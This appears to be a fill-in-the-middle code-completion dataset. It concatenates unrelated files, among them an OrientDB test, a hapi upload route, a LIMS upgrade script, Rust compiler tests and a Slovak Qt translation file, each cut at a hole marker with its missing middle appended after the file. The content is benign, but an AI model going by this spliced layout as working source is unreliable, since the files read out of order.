"CREATE VERTEX V CONTENT {'longNum': 5356336298435356336}" )[0].longNum lon4 = self.client.command( "CREATE VERTEX V CONTENT {'sciNum': 6.022E23}" )[0].sciNum lon5 = self.client.command( "CREATE VERTEX V CONTENT {'sciNum': 6.022E-23}" )[0].sciNum assert isinstance(lon1, float), \ "type(lon1) is not equal to 'float': %r" % type(lon1) assert isinstance(lon2, float), \ "type(lon2) is not equal to 'float': %r" % type(lon2) assert isinstance(lon4, float), \ "type(lon4) is not equal to 'float': %r" % type(lon4) assert isinstance(lon5, float), \ "type(lon5) is not equal to 'float': %r" % type(lon5) assert isinstance(lon3, int), \ "type(lon3) is not equal to 'int': %r" \ % type(lon3)<|fim▁end|>
def test_nested_objects_9(self): res = self.client.command( 'create vertex v content '
<|file_name|>cucumber-upload.js<|end_file_name|><|fim▁begin|>'use strict'; const Joi = require('joi'); const uuid = require('uuid'); const reqUtils = require('../utils/requestUtils'); const R = require('ramda'); //fixme: allow unknown fields and just require absolutely mandatory ones const cucumberSchema = Joi.array().items(Joi.object().keys({ id: Joi.string().required(), name: Joi.string().required(), description: Joi.string(), line: Joi.number().integer(), keyword: Joi.string(), uri: Joi.string(), elements: Joi.array().items(Joi.object().keys({ name: Joi.string().required(), id: Joi.string().required(), line: Joi.number().integer(), keyword: Joi.string(), description: Joi.string(), type: Joi.string().required(), steps: Joi.array().items(Joi.object().keys({ name: Joi.string(), line: Joi.number().integer(), keyword: Joi.string(), result: Joi.object().keys({<|fim▁hole|> status: Joi.string(), duration: Joi.number().integer() }), match: Joi.object().keys({ location: Joi.string() }) })) })) })); module.exports = function (server, emitter) { server.route({ method: 'POST', path: '/upload/cucumber', config: { tags: ['upload'], payload: { //allow: ['multipart/form-data'], parse: true, output: 'stream' }, validate: { query: { evaluation: Joi.string().min(1).required(), evaluationTag: Joi.string().min(1).required(), subject: Joi.string().min(1).required() } } }, handler: function(request, reply) { return reqUtils.getObject(request, 'cucumber') .then(o => reqUtils.validateObject(o, cucumberSchema)) .then(report => { emitter.emit( 'uploads/cucumber', R.assoc('report', report, R.pick(['subject', 'evaluation', 'evaluationTag'], request.query)) ); return reply().code(202); }) // fixme: this will resolve even internal errors as 429's // break the initial processing (which returns 429 codes) // from the final one (which returns 5xx codes) .catch(e => { return reply(e.message).code(400); }); } }); };<|fim▁end|>
<|file_name|>to3015.py<|end_file_name|><|fim▁begin|>from dependencies.dependency import aq_inner from dependencies.dependency import aq_parent from lims.permissions import * from dependencies.dependency import BaseContent from lims.upgrade import stub def upgrade(tool):<|fim▁hole|> # Hack prevent out-of-date upgrading # Related: PR #1484 # https://github.com/bikalabs/Bika-LIMS/pull/1484 from lims.upgrade import skip_pre315 if skip_pre315(aq_parent(aq_inner(tool))): return True portal = aq_parent(aq_inner(tool)) setup = portal.portal_setup setup.runImportStepFromProfile('profile-bika.lims:default', 'typeinfo') stub('bika.lims.content.invoicelineitem', 'InvoiceLineItem', BaseContent) for inv in portal['invoices'].objectValues(): inv.invoice_lineitems = [] for invl in inv.objectValues(): item = dict( ItemDate=invl.ItemDate, ItemDescription=invl.ItemDescription, ClientOrderNumber=invl.ClientOrderNumber, Subtotal=invl.Subtotal, VATAmount=invl.VATAmount, Total=invl.Total, ) inv.invoice_lineitems.append(item) return True<|fim▁end|>
<|file_name|>issue-10200.rs<|end_file_name|><|fim▁begin|>// Copyright 2014 The Rust Project Developers. See the COPYRIGHT // file at the top-level directory of this distribution and at // http://rust-lang.org/COPYRIGHT. // // Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or // http://www.apache.org/licenses/LICENSE-2.0> or the MIT license // <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your // option. This file may not be copied, modified, or distributed // except according to those terms. <|fim▁hole|> match Foo(true) { foo(x) //~ ERROR `foo` is not an enum variant, struct or const => () } }<|fim▁end|>
struct Foo(bool); fn foo(_: uint) -> Foo { Foo(false) } fn main() {
<|file_name|>iTestClient-sk.ts<|end_file_name|><|fim▁begin|><?xml version="1.0" encoding="utf-8"?> <!DOCTYPE TS> <TS version="2.0" language="sk_SK"> <context> <name>AboutWidget</name> <message> <source>About iTest</source> <translation>O programe iTest</translation> </message> <message> <source>About Qt</source> <translation>O Qt</translation> </message> <message> <source>This program is distributed under the terms of the GPL v2.</source> <translation>Tento program je distribuovaný pod licenciou GPL v2.</translation> </message> <message> <source>The program is provided AS IS with ABSOLUTELY NO WARRANTY OF ANY KIND, INCLUDING THE WARRANTY OF DESIGN, MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.</source> <translation>Tento program je poskytovaný TAK AKO JE s ABSOLÚTNE ŽIADNOU ZÁRUKOU AKÉHOKOĽVEK DRUHU.</translation> </message> <message> <source>iTest</source> <translation>iTest</translation> </message> <message> <source>Version %1</source> <translation>Verzia %1</translation> </message> <message> <source>Licence</source> <translation>Licencia</translation> </message> <message> <source>iTest is an application suite consisting of a Server and a Client designed for easy computerised examination.</source> <translation>iTest je sada aplikácií pozostávajúca zo serverového a klientského programu dizajnovaných pre jednoduché skúšanie pomocou počítača.</translation> </message> <message> <source>http://www.gnu.org/licenses/gpl-2.0.html</source> <translation>http://www.gpl.sk/v2/</translation> </message> </context> <context> <name>MainWindow</name> <message> <source>Cannot write file %1: %2.</source> <translation>Nemôžem zapisovať do súboru %1: %2.</translation> </message> <message> <source>Ready</source> <translation>Pripravený</translation> </message> <message> <source>Open database</source> <translation>Otvoriť databázu</translation> </message> <message> <source>Open database file</source> <translation>Otvoriť databázový súbor</translation> </message> <message> <source>Cannot read file %1: %2.</source> <translation>Nemôžem čítať súbor %1: %2.</translation> </message> <message> <source>iTest version notice</source> <translation>Upozornenie o verzii iTest</translation> </message> <message> <source>You need a newer version of iTest to open this database file.</source> <translation>Na otvorenie tohto databázového súboru potrebujete novšiu verziu programu iTest.</translation> </message> <message> <source>Database date</source> <translation>Dátum</translation> </message> <message> <source>&lt;b&gt;Results:&lt;/b&gt;</source> <translation>&lt;b&gt;Výsledky:&lt;/b&gt;</translation> </message> <message> <source>&lt;b&gt;Name:&lt;/b&gt;</source> <translation>&lt;b&gt;Meno:&lt;/b&gt;</translation> </message> <message> <source>Comments</source> <translation>Poznámky</translation> </message> <message> <source>There is a newer version of iTest available. Nonetheless, this version is able to open the database file you selected, but you are most probably missing a whole bunch of cool new features.</source> <translation type="obsolete">Je dostupná nová verzia iTest. Napriek tomu však táto verzia vie otvoriť vybraný databázový súbor, ale pravdepodobne prichádzate o množstvo nových možností.</translation> </message> <message> <source>Retrieving test data...</source> <translation>Získavam testové dáta...</translation> </message> <message> <source>Save answer log</source> <translation>Uložiť záznam odpovedí</translation> </message> <message> <source>The host was not found. 
Please check the host name and port settings.</source> <translation>Hostiteľ nenájdený. Prosím skontrolujte meno hostiteľa a nastavenie portu.</translation> </message> <message> <source>The connection was refused by the peer. Make sure the iTest server is running, and check that the host name and port settings are correct.</source> <translation>Spojenie odmietnuté peerom. Uistite sa, že server iTest beží, a že meno hostiteľa a nastavenie portu sú správne.</translation> </message> <message> <source>The following error occurred: %1.</source> <translation>Vyskytla sa nasledujúca chyba: %1.</translation> </message> <message> <source>Output file path</source> <translation>Cesta k výstupnému súboru</translation> </message> <message> <source>answers.itcl</source> <translation>odpovede.itcl</translation> </message> <message> <source>iTest off-line client log (*.itcl)</source> <translation>iTest off-line záznamy o klientoch (*.itcl)</translation> </message> <message> <source>Loading test data...</source> <translation>Načítavam testové dáta...</translation> </message> <message> <source>Reading database file...</source> <translation>Čítam databázový súbor...</translation> </message> <message> <source>Generating test...</source> <translation>Generujem test...</translation> </message> <message> <source>Finish the exam</source> <translation>Ukončiť skúšku</translation> </message> <message> <source>Are you sure you want to finish? Once you click Finish there is no going back.</source> <translation>Naozaj chcete skončiť? Po kliknutí na &quot;Koniec&quot; sa už nedá vrátiť späť.</translation> </message> <message> <source>&amp;Finish</source> <translation>&amp;Koniec</translation> </message> <message> <source>&amp;Cancel</source> <translation>&amp;Zrušiť</translation> </message> <message> <source>Your name, please.</source> <translation>Vaše meno, prosím.</translation> </message> <message> <source>You cannot proceed unless you give us your name.</source> <translation>Nemôžete pokračovať, kým neuvediete svoje meno.</translation> </message> <message> <source>Exam finished</source> <translation>Skúška ukončená</translation> </message> <message> <source>You have run out of time. Your answers are being sent.</source> <translation>Váš čas vypršal. Vaše odpovede sa posielajú.</translation> </message> <message> <source>Invalid data received. There might be something wrong with the server.</source> <translation>Prijaté neplatné dáta. 
Možno niečo nie je v poriadku so serverom.</translation> </message> <message> <source>Connect to an iTest server</source> <translation>Pripojiť sa k serveru iTest</translation> </message> <message> <source>&lt;b&gt;Server name&lt;/b&gt;</source> <translation>&lt;b&gt;Meno servera&lt;/b&gt;</translation> </message> <message> <source>&lt;b&gt;Server port&lt;/b&gt;</source> <translation>&lt;b&gt;Port servera&lt;/b&gt;</translation> </message> <message> <source>Connect</source> <translation>Pripojiť</translation> </message> <message> <source>Use an iTest database file</source> <translation>Použiť databázový súbor iTest</translation> </message> <message> <source>&lt;b&gt;Database file path&lt;/b&gt;</source> <translation>&lt;b&gt;Cesta k databázovému súboru&lt;/b&gt;</translation> </message> <message> <source>Browse</source> <translation>Prehľadávať</translation> </message> <message> <source>Load</source> <translation>Načítať</translation> </message> <message> <source>&lt;b&gt;Save answers to&lt;/b&gt;</source> <translation>&lt;b&gt;Uložiť odpovede do&lt;/b&gt;</translation> </message> <message> <source>If connected to an iTest server, results will be sent automatically. You only need this file if there is no network available or in case of connection breakdown.</source> <translation>Ak ste pripojení na server iTest, odpovede sa zašlú automaticky. Tento súbor budete potrebovať len vtedy, keď nemáte k dispozícii sieť alebo v prípade zlyhania pripojenia.</translation> </message> <message> <source>$HOME/TestName-Date-SurnameName.itcl, where $HOME is the directory of the current user&apos;s profile on Windows and the home directory on Unix/Linux/Mac OS</source> <translation>$HOME/MenoTestu-Dátum-PriezviskoMeno.itcl, kde $HOME je priečinok aktuálneho užívateľského účtu vo Windows a domovský priečinok v systémoch Unix/Linux/Mac OS</translation> </message> <message> <source>Use default</source> <translation>Použiť štandardné nastavenie</translation> </message> <message> <source>&lt;b&gt;Test information&lt;/b&gt;</source> <translation>&lt;b&gt;Informácie o teste&lt;/b&gt;</translation> </message> <message> <source>Test name</source> <translation>Meno testu</translation> </message> <message> <source>Test date</source> <translation>Dátum testu</translation> </message> <message> <source>Test time</source> <translation>Čas na test</translation> </message> <message> <source>Number of questions</source> <translation>Počet otázok</translation> </message> <message> <source>Number of categories</source> <translation>Počet kategórií</translation> </message> <message> <source>Category names</source> <translation>Mená kategórií</translation> </message> <message> <source>Data</source> <translation>Dáta</translation> </message> <message> <source>Quit</source> <translation>Koniec</translation> </message> <message> <source>About</source> <translation>O programe</translation> </message> <message> <source>Your name:</source> <translation>Vaše meno:</translation> </message> <message> <source>When you are ready to begin the examination, click the Start button below.</source> <translation>Keď budete pripravení začať so skúškou, kliknite na tlačidlo Štart dole.</translation> </message> <message> <source>Start</source> <translation>Štart</translation> </message> <message> <source>Show remaining time</source> <translation>Zobraziť zostávajúci čas</translation> </message> <message> <source>minute(s)</source> <translation>minút(a)</translation> </message> <message> <source>Last question</source> <translation>Predchádzajúca 
otázka</translation> </message> <message> <source>Next question</source> <translation>Ďalšia otázka</translation> </message> <message> <source>Finish</source> <translation>Koniec</translation> </message> <message> <source>&lt;b&gt;Score:&lt;/b&gt;</source> <translation>&lt;b&gt;Skóre:&lt;/b&gt;</translation> </message> <message> <source>&lt;b&gt;Other settings&lt;/b&gt;</source> <translation>&lt;b&gt;Iné nastavenia&lt;/b&gt;</translation> </message> <message> <source>Hide question names, show numbers instead</source> <translation>Skryť mená otázok, zobraziť namiesto nich čísla</translation> </message> <message> <source>iTest off-line test sessions (*.itos);;All files (*.*)</source> <translation>iTest off-line testové sedenia (*.itos);;Všetky súbory (*.*)</translation> </message> <message> <source>%1 out of %2 (%3)</source> <translation>%1 z %2 (%3)</translation> </message> <message> <source>PASSED</source> <translation>UROBIL(A)</translation> </message> <message> <source>FAILED</source> <translation>NEUROBIL(A)</translation> </message> <message> <source>Total</source> <translation>Celkom</translation> </message> <message> <source>Pass mark</source> <translation>Dostatočná</translation> </message> <message> <source>New test</source> <translation>Nový test</translation> </message> <message> <source>iTestClient</source> <translation>iTestClient</translation> </message> <message> <source>iTestClient - Load test data</source> <translation>iTestClient - Načítať testové dáta</translation> </message> <message> <source>%1 of total %2</source> <translation>%1 z %2</translation> </message> <message> <source>Do not show correct answers at the end of the test</source> <translation>Nezobraziť na konci testu správne odpovede</translation> </message> <message> <source>LTR</source> <translation>LTR</translation> </message> <message> <source>Welcome!</source> <translation>Vitajte!</translation> </message> </context> <context> <name>QObject</name> <message> <source>a)</source> <translation>a)</translation> </message> <message> <source>b)</source> <translation>b)</translation> </message> <message> <source>c)</source> <translation>c)</translation> </message> <message> <source>d)</source> <translation>d)</translation> </message> <message> <source>e)</source> <translation>e)</translation> </message> <message> <source>f)</source> <translation>f)</translation> </message> <message> <source>g)</source> <translation>g)</translation> </message> <message> <source>h)</source> <translation>h)</translation> </message><|fim▁hole|> <message> <source>None</source> <translation>Žiadna</translation> </message> </context> <context> <name>QuestionWidget</name> <message> <source>%1 out of %2</source> <translation>%1 z %2</translation> </message> </context> </TS><|fim▁end|>
<message> <source>i)</source> <translation>i)</translation> </message>
<|file_name|>length.js<|end_file_name|><|fim▁begin|>var _ = require('underscore'); /* A rule should contain explain and rule methods */ // TODO explain explain // TODO explain missing // TODO explain assert function assert (options, password) { return !!password && options.minLength <= password.length; } function explain(options) { if (options.minLength === 1) { return { message: 'Non-empty password required', code: 'nonEmpty' }; } return { message: 'At least %d characters in length', format: [options.minLength], code: 'lengthAtLeast'<|fim▁hole|> module.exports = { validate: function (options) { if (!_.isObject(options)) { throw new Error('options should be an object'); } if (!_.isNumber(options.minLength) || _.isNaN(options.minLength)) { throw new Error('length expects minLength to be a non-zero number'); } return true; }, explain: explain, missing: function (options, password) { var explained = explain(options); explained.verified = !!assert(options, password); return explained; }, assert: assert };<|fim▁end|>
}; }
<|file_name|>inherent_impls.rs<|end_file_name|><|fim▁begin|>// This test case tests the incremental compilation hash (ICH) implementation // for let expressions. // The general pattern followed here is: Change one thing between rev1 and rev2 // and make sure that the hash has changed, then change nothing between rev2 and // rev3 and make sure that the hash has not changed. // build-pass (FIXME(62277): could be check-pass?) // revisions: cfail1 cfail2 cfail3 // compile-flags: -Z query-dep-graph -Zincremental-ignore-spans #![allow(warnings)] #![feature(rustc_attrs)] #![crate_type="rlib"] pub struct Foo; // Change Method Name ----------------------------------------------------------- #[cfg(cfail1)] impl Foo { pub fn method_name() { } } #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2", except="hir_owner,associated_item_def_ids")] #[rustc_clean(cfg="cfail3")] impl Foo { #[rustc_clean(cfg="cfail3")] pub fn method_name2() { } } // Change Method Body ----------------------------------------------------------- // // This should affect the method itself, but not the impl. #[cfg(cfail1)] impl Foo { pub fn method_body() { } } #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2")] #[rustc_clean(cfg="cfail3")] impl Foo { #[rustc_clean( cfg="cfail2", except="hir_owner_nodes,optimized_mir,promoted_mir,typeck" )] #[rustc_clean(cfg="cfail3")] pub fn method_body() { println!("Hello, world!"); } } // Change Method Body (inlined) ------------------------------------------------ // // This should affect the method itself, but not the impl. #[cfg(cfail1)] impl Foo { #[inline] pub fn method_body_inlined() { } } #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2")] #[rustc_clean(cfg="cfail3")] impl Foo { #[rustc_clean( cfg="cfail2", except="hir_owner_nodes,optimized_mir,promoted_mir,typeck" )] #[rustc_clean(cfg="cfail3")] #[inline] pub fn method_body_inlined() { println!("Hello, world!"); } } // Change Method Privacy ------------------------------------------------------- #[cfg(cfail1)] impl Foo { pub fn method_privacy() { } } #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2", except="hir_owner")] #[rustc_clean(cfg="cfail3")] impl Foo { #[rustc_clean(cfg="cfail2", except="associated_item,hir_owner,hir_owner_nodes")] #[rustc_clean(cfg="cfail3")] fn method_privacy() { } } // Change Method Selfness ----------------------------------------------------------- #[cfg(cfail1)] impl Foo { pub fn method_selfness() { } } #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2", except="hir_owner")] #[rustc_clean(cfg="cfail3")] impl Foo { #[rustc_clean( cfg="cfail2", except="hir_owner,hir_owner_nodes,fn_sig,generics_of,typeck,associated_item,optimized_mir", )] #[rustc_clean(cfg="cfail3")] pub fn method_selfness(&self) { } } // Change Method Selfmutness --------------------------------------------------- #[cfg(cfail1)] impl Foo { pub fn method_selfmutness(&self) { } } #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2")] #[rustc_clean(cfg="cfail3")] impl Foo { #[rustc_clean( cfg="cfail2", except="hir_owner,hir_owner_nodes,fn_sig,typeck,optimized_mir" )] #[rustc_clean(cfg="cfail3")] pub fn method_selfmutness(&mut self) { } } // Add Method To Impl ---------------------------------------------------------- #[cfg(cfail1)] impl Foo { pub fn add_method_to_impl1(&self) { } } #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2", except="hir_owner,associated_item_def_ids")] #[rustc_clean(cfg="cfail3")] impl Foo { #[rustc_clean(cfg="cfail2")] #[rustc_clean(cfg="cfail3")] pub fn add_method_to_impl1(&self) { } #[rustc_clean(cfg="cfail3")] pub fn add_method_to_impl2(&self) { 
} } // Add Method Parameter -------------------------------------------------------- #[cfg(cfail1)] impl Foo { pub fn add_method_parameter(&self) { } } #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2")] #[rustc_clean(cfg="cfail3")] impl Foo { #[rustc_clean( cfg="cfail2", except="hir_owner,hir_owner_nodes,fn_sig,typeck,optimized_mir" )] #[rustc_clean(cfg="cfail3")] pub fn add_method_parameter(&self, _: i32) { } } // Change Method Parameter Name ------------------------------------------------ #[cfg(cfail1)] impl Foo { pub fn change_method_parameter_name(&self, a: i64) { } } #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2")] #[rustc_clean(cfg="cfail3")] impl Foo { #[rustc_clean(cfg="cfail2", except="hir_owner_nodes,optimized_mir")] #[rustc_clean(cfg="cfail3")] pub fn change_method_parameter_name(&self, b: i64) { } } // Change Method Return Type --------------------------------------------------- #[cfg(cfail1)] impl Foo { pub fn change_method_return_type(&self) -> u16 { 0 } } #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2")] #[rustc_clean(cfg="cfail3")] impl Foo { #[rustc_clean( cfg="cfail2", except="hir_owner,hir_owner_nodes,fn_sig,optimized_mir,typeck")] #[rustc_clean(cfg="cfail3")] pub fn change_method_return_type(&self) -> u8 { 0 } } // Make Method #[inline] ------------------------------------------------------- #[cfg(cfail1)] impl Foo { pub fn make_method_inline(&self) -> u8 { 0 } } #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2")] #[rustc_clean(cfg="cfail3")] impl Foo { #[rustc_clean(cfg="cfail2")] #[rustc_clean(cfg="cfail3")] #[inline] pub fn make_method_inline(&self) -> u8 { 0 } } // Change order of parameters ------------------------------------------------- #[cfg(cfail1)] impl Foo { pub fn change_method_parameter_order(&self, a: i64, b: i64) { } } #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2")] #[rustc_clean(cfg="cfail3")] impl Foo { #[rustc_clean(cfg="cfail2", except="hir_owner_nodes,optimized_mir")] #[rustc_clean(cfg="cfail3")] pub fn change_method_parameter_order(&self, b: i64, a: i64) { } } // Make method unsafe ---------------------------------------------------------- #[cfg(cfail1)] impl Foo { pub fn make_method_unsafe(&self) { } } #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2")] #[rustc_clean(cfg="cfail3")] impl Foo { #[rustc_clean( cfg="cfail2", except="hir_owner,hir_owner_nodes,fn_sig,typeck,optimized_mir" )] #[rustc_clean(cfg="cfail3")] pub unsafe fn make_method_unsafe(&self) { } } // Make method extern ---------------------------------------------------------- #[cfg(cfail1)] impl Foo { pub fn make_method_extern(&self) { } } #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2")] #[rustc_clean(cfg="cfail3")] impl Foo { #[rustc_clean(cfg="cfail2", except="hir_owner,hir_owner_nodes,fn_sig,typeck")] #[rustc_clean(cfg="cfail3")] pub extern "C" fn make_method_extern(&self) { } } // Change method calling convention -------------------------------------------- #[cfg(cfail1)] impl Foo { pub extern "C" fn change_method_calling_convention(&self) { } } #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2")] #[rustc_clean(cfg="cfail3")] impl Foo { #[rustc_clean(cfg="cfail2", except="hir_owner,hir_owner_nodes,fn_sig,typeck")] #[rustc_clean(cfg="cfail3")] pub extern "system" fn change_method_calling_convention(&self) { } } // Add Lifetime Parameter to Method -------------------------------------------- #[cfg(cfail1)] impl Foo { pub fn add_lifetime_parameter_to_method(&self) { } } #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2")] #[rustc_clean(cfg="cfail3")] impl Foo { // Warning: Note that `typeck` are 
coming up clean here. // The addition or removal of lifetime parameters that don't // appear in the arguments or fn body in any way does not, in // fact, affect the `typeck` in any semantic way (at least // as of this writing). **However,** altering the order of // lowering **can** cause it appear to affect the `typeck`: // if we lower generics before the body, then the `HirId` for // things in the body will be affected. So if you start to see // `typeck` appear dirty, that might be the cause. -nmatsakis #[rustc_clean(cfg="cfail2", except="hir_owner,hir_owner_nodes,fn_sig")] #[rustc_clean(cfg="cfail3")] pub fn add_lifetime_parameter_to_method<'a>(&self) { } } // Add Type Parameter To Method ------------------------------------------------ #[cfg(cfail1)] impl Foo { pub fn add_type_parameter_to_method(&self) { } } #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2")] #[rustc_clean(cfg="cfail3")] impl Foo { // Warning: Note that `typeck` are coming up clean here. // The addition or removal of type parameters that don't appear in // the arguments or fn body in any way does not, in fact, affect // the `typeck` in any semantic way (at least as of this // writing). **However,** altering the order of lowering **can** // cause it appear to affect the `typeck`: if we lower // generics before the body, then the `HirId` for things in the // body will be affected. So if you start to see `typeck` // appear dirty, that might be the cause. -nmatsakis #[rustc_clean( cfg="cfail2", except="hir_owner,hir_owner_nodes,generics_of,predicates_of,type_of", )] #[rustc_clean(cfg="cfail3")] pub fn add_type_parameter_to_method<T>(&self) { } } // Add Lifetime Bound to Lifetime Parameter of Method -------------------------- #[cfg(cfail1)] impl Foo { pub fn add_lifetime_bound_to_lifetime_param_of_method<'a, 'b>(&self) { } } #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2")] #[rustc_clean(cfg="cfail3")] impl Foo { #[rustc_clean( cfg="cfail2", except="hir_owner,hir_owner_nodes,generics_of,predicates_of,type_of,fn_sig" )] #[rustc_clean(cfg="cfail3")] pub fn add_lifetime_bound_to_lifetime_param_of_method<'a, 'b: 'a>(&self) { } } // Add Lifetime Bound to Type Parameter of Method ------------------------------ #[cfg(cfail1)] impl Foo { pub fn add_lifetime_bound_to_type_param_of_method<'a, T>(&self) { } } #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2")] #[rustc_clean(cfg="cfail3")] impl Foo { // Warning: Note that `typeck` are coming up clean here. // The addition or removal of bounds that don't appear in the // arguments or fn body in any way does not, in fact, affect the // `typeck` in any semantic way (at least as of this // writing). **However,** altering the order of lowering **can** // cause it appear to affect the `typeck`: if we lower // generics before the body, then the `HirId` for things in the // body will be affected. So if you start to see `typeck` // appear dirty, that might be the cause. -nmatsakis #[rustc_clean(cfg="cfail2", except="hir_owner,hir_owner_nodes,generics_of,predicates_of,\ type_of,fn_sig")] #[rustc_clean(cfg="cfail3")] pub fn add_lifetime_bound_to_type_param_of_method<'a, T: 'a>(&self) { } } // Add Trait Bound to Type Parameter of Method ------------------------------ #[cfg(cfail1)] impl Foo { pub fn add_trait_bound_to_type_param_of_method<T>(&self) { } } #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2")] #[rustc_clean(cfg="cfail3")] impl Foo { // Warning: Note that `typeck` are coming up clean here. 
// The addition or removal of bounds that don't appear in the // arguments or fn body in any way does not, in fact, affect the // `typeck` in any semantic way (at least as of this // writing). **However,** altering the order of lowering **can** // cause it appear to affect the `typeck`: if we lower // generics before the body, then the `HirId` for things in the // body will be affected. So if you start to see `typeck` // appear dirty, that might be the cause. -nmatsakis #[rustc_clean(cfg="cfail2", except="hir_owner,hir_owner_nodes,predicates_of")] #[rustc_clean(cfg="cfail3")] pub fn add_trait_bound_to_type_param_of_method<T: Clone>(&self) { } } // Add #[no_mangle] to Method -------------------------------------------------- #[cfg(cfail1)] impl Foo { pub fn add_no_mangle_to_method(&self) { }<|fim▁hole|>#[rustc_clean(cfg="cfail3")] impl Foo { #[rustc_clean(cfg="cfail2")] #[rustc_clean(cfg="cfail3")] #[no_mangle] pub fn add_no_mangle_to_method(&self) { } } struct Bar<T>(T); // Add Type Parameter To Impl -------------------------------------------------- #[cfg(cfail1)] impl Bar<u32> { pub fn add_type_parameter_to_impl(&self) { } } #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2", except="hir_owner,hir_owner_nodes,generics_of")] #[rustc_clean(cfg="cfail3")] impl<T> Bar<T> { #[rustc_clean( cfg="cfail2", except="generics_of,fn_sig,typeck,type_of,optimized_mir" )] #[rustc_clean(cfg="cfail3")] pub fn add_type_parameter_to_impl(&self) { } } // Change Self Type of Impl ---------------------------------------------------- #[cfg(cfail1)] impl Bar<u32> { pub fn change_impl_self_type(&self) { } } #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2", except="hir_owner")] #[rustc_clean(cfg="cfail3")] impl Bar<u64> { #[rustc_clean(cfg="cfail2", except="fn_sig,optimized_mir,typeck")] #[rustc_clean(cfg="cfail3")] pub fn change_impl_self_type(&self) { } } // Add Lifetime Bound to Impl -------------------------------------------------- #[cfg(cfail1)] impl<T> Bar<T> { pub fn add_lifetime_bound_to_impl_parameter(&self) { } } #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2", except="hir_owner,hir_owner_nodes")] #[rustc_clean(cfg="cfail3")] impl<T: 'static> Bar<T> { #[rustc_clean(cfg="cfail2")] #[rustc_clean(cfg="cfail3")] pub fn add_lifetime_bound_to_impl_parameter(&self) { } } // Add Trait Bound to Impl Parameter ------------------------------------------- #[cfg(cfail1)] impl<T> Bar<T> { pub fn add_trait_bound_to_impl_parameter(&self) { } } #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2", except="hir_owner,hir_owner_nodes")] #[rustc_clean(cfg="cfail3")] impl<T: Clone> Bar<T> { #[rustc_clean(cfg="cfail2")] #[rustc_clean(cfg="cfail3")] pub fn add_trait_bound_to_impl_parameter(&self) { } } // Force instantiation of some fns so we can check their hash. pub fn instantiation_root() { Foo::method_privacy(); #[cfg(cfail1)] { Bar(0u32).change_impl_self_type(); } #[cfg(not(cfail1))] { Bar(0u64).change_impl_self_type(); } }<|fim▁end|>
} #[cfg(not(cfail1))] #[rustc_clean(cfg="cfail2")]
<|file_name|>explicit-self.rs<|end_file_name|><|fim▁begin|>// Copyright 2012 The Rust Project Developers. See the COPYRIGHT // file at the top-level directory of this distribution and at // http://rust-lang.org/COPYRIGHT. // // Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or // http://www.apache.org/licenses/LICENSE-2.0> or the MIT license // <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your // option. This file may not be copied, modified, or distributed // except according to those terms. #[feature(managed_boxes)]; static tau: f64 = 2.0*3.14159265358979323; struct Point {x: f64, y: f64} struct Size {w: f64, h: f64} enum shape { circle(Point, f64), rectangle(Point, Size) } fn compute_area(shape: &shape) -> f64 { match *shape { circle(_, radius) => 0.5 * tau * radius * radius, rectangle(_, ref size) => size.w * size.h } } impl shape { // self is in the implicit self region pub fn select<'r, T>(&self, threshold: f64, a: &'r T, b: &'r T) -> &'r T { if compute_area(self) > threshold {a} else {b} } } fn select_based_on_unit_circle<'r, T>( threshold: f64, a: &'r T, b: &'r T) -> &'r T { let shape = &circle(Point{x: 0.0, y: 0.0}, 1.0); shape.select(threshold, a, b) } #[deriving(Clone)] struct thing { x: A }<|fim▁hole|> #[deriving(Clone)] struct A { a: @int } fn thing(x: A) -> thing { thing { x: x } } impl thing { pub fn foo(@self) -> int { *self.x.a } pub fn bar(~self) -> int { *self.x.a } pub fn quux(&self) -> int { *self.x.a } pub fn baz<'a>(&'a self) -> &'a A { &self.x } pub fn spam(self) -> int { *self.x.a } } trait Nus { fn f(&self); } impl Nus for thing { fn f(&self) {} } pub fn main() { let x = @thing(A {a: @10}); assert_eq!(x.foo(), 10); assert_eq!(x.quux(), 10); let y = ~thing(A {a: @10}); assert_eq!(y.clone().bar(), 10); assert_eq!(y.quux(), 10); let z = thing(A {a: @11}); assert_eq!(z.spam(), 11); }<|fim▁end|>
<|file_name|>main.rs<|end_file_name|><|fim▁begin|><|fim▁hole|>fn main() { let config = ConfigBuilder::new() .with_width(150) .with_title("Rust is awesome".to_string()) .finalize(); println!("{}", config); let config = ConfigBuilder::new() .with_width(1000) .with_height(750) .with_minimized(true) .finalize(); println!("{}", config); }<|fim▁end|>
extern crate config; use config::ConfigBuilder;
<|file_name|>long.rs<|end_file_name|><|fim▁begin|><|fim▁hole|>use std::{fs, io, time::Instant}; extern crate svgbob; fn main() -> io::Result<()> { let art = include_str!("../test_data/long.bob"); let t1 = Instant::now(); fs::create_dir_all("out")?; fs::write("out/long.svg", svgbob::to_svg(art))?; println!("took {}ms", t1.elapsed().as_millis()); Ok(()) }<|fim▁end|>
